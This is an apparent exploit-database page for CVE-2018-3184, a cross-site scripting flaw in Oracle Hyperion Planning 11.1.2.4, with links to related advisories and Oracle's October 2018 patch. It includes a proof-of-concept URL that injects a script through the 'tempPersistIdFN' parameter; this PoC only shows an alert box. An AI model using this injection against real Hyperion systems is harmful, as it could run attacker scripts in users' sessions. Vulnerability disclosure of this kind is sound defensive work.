Lucene search
Hasan Alqawzai1337DAY-ID-31435HistoryOct 26, 2018 - 12:00 a.m.
Oracle Hyperion Planning 11.1.2.4 Cross Site Scripting Vulnerability
2018-10-2600:00:00
Hasan Alqawzai
0day.today
29
EPSS
0.001
Percentile
26.3%
Exploit for windows platform in category web applications
# Exploit Title: Oracle Hyperion Planning, 11.1.2.4 Vulnerable to Cross Site Scripting
# Exploit Author: Hasan Alqawzai
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/applications/performance-management/products/financial-close-reporting/hyperion-financial-management/
# Version: 11.1.2.4
# Tested on: Windows
# CVE : CVE-2018-3184
# Description :
It was detected cross-site scripting , which allows an attacker to execute a dynamic script in the context of the application.
# Prerequisites :
Access to Oracle Hyperion
# PoC Exploit: XSS
https://examble.com/raframework/browse/editFileACL?dest=0000016f77a61591-1111-3dfd-c9ao0p1b&tempPersistIdFN=1525";</script><script>alert(/hasan/)</script>
# 0day.today [2018-10-26] #Related
cve
cve
CVE-2018-3184
2018-10-17 01:31:20
cvelist
cvelist
CVE-2018-3184
2018-10-17 01:00:00
nvd
nvd
CVE-2018-3184
2018-10-17 01:31:20
prion
prion
Design/Logic Flaw
2018-10-17 01:31:00
packetstorm
packetstorm
Oracle Hyperion Planning 11.1.2.4 Cross Site Scripting
2018-10-26 00:00:00
oracle
oracle
Oracle Critical Patch Update - October 2018
2018-12-18 00:00:00